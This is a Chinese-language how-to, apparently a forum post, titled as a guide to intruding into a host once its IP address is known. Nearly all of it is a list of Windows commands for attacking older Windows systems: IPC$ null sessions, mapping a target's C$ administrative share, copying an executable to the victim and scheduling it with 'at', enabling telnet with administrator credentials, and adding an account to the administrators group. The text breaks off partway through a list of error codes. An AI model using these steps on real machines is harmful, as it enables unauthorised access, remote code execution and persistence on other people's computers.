知道對方的IP后怎么侵入他的主機？

手動的空連接 IPC$ 空連接命令

1)建立空連接: net use \\IP\ipc$ ““ /user:““ (一定要注意:這一行命令中包含了3個空格)

2)建立非空連接: net use \\IP\ipc$ “用戶名“ /user:“密碼“ (同樣有3個空格)

3)映射默認共享: net use z: \\IP\c$ “密碼“ /user:“用戶名“ (即可將對方的c盤映射為自己的z盤，其他盤類推) 如果已經和目標建立了ipc$，則可以直接用IP+盤符+$訪問,具體命令 net use z: \\IP\c$

4)刪除一個ipc$連接 net use \\IP\ipc$ /del

5)刪除共享映射 net use c: /del 刪除映射的c盤，其他盤類推 net use * /del 刪除全部,會有提示要求按y確認 3 查看遠程主機的共享資源（但看不到默認共享） net view \\IP 4 查看本地主機的共享資源（可以看到本地的默認共享） net share 5 得到遠程主機的用戶名列表 nbtstat -A IP 6 得到本地主機的用戶列表 net user 7 查看遠程主機的當前時間 net time \\IP 8 顯示本地主機當前服務 net start 9 啟動/關閉本地服務 net start 服務名 /y net stop 服務名 /y 10 映射遠程共享: net use z: \\IP\baby 此命令將共享名為baby的共享資源映射到z盤 11 刪除共享映射 net use c: /del 刪除映射的c盤，其他盤類推 net use * /del /y刪除全部 12 向遠程主機復制文件 copy \路徑\srv.exe \\IP\共享目錄名，如： copy ccbirds.exe \\*.*.*.*\c 即將當前目錄下的文件復制到對方c盤內 13 遠程添加計劃任務 at \\ip 時間程序名，如： at \\127.0.0.0 11:00 love.exe 注意：時間盡量使用24小時制；在系統默認搜索路徑（比如system32/）下不用加路徑，否則必須加全路徑 14 開啟遠程主機的telnet 這里要用到一個小程序：opentelnet.exe，各大下載站點都有，而且還需要滿足四個要求： 1）目標開啟了ipc$共享 2）你要擁有管理員密碼和帳號 3）目標開啟RemoteRegistry服務，用戶就該ntlm認證 4）對WIN2K/XP有效，NT未經測試 命令格式：OpenTelnet.exe \\server account psw NTLM認證方式 port 試例如下：c:\OpenTelnet.exe \\*.*.*.* administrator ““ 1 90 15 激活用戶/加入管理員組 1 net uesr account /active:yes 2 net localgroup administrators account /add 16 關閉遠程主機的telnet 同樣需要一個小程序：ResumeTelnet.exe 命令格式：ResumeTelnet.exe \\server account psw 試例如下：c:\ResumeTelnet.exe \\*.*.*.* administrator ““ 17 刪除一個已建立的ipc$連接 net use \\IP\ipc$ /del 教你用個at命令,你拷一個程序可以指定時間讓其執行的 at \\computername time /interactive | /every:date,.../next:date,... command 比如:at 00:00 cmd /c copy C:\Documents\*.* C:\MyDocs 常見錯誤代碼 錯誤號5，拒絕訪問：很可能你使用的用戶不是管理員權限的，先提升權限； 錯誤號51，Windows無法找到網絡路徑：網絡有問題； 錯誤號53，找不到網絡路徑：ip地址錯誤；目標未開機；目標lanmanserve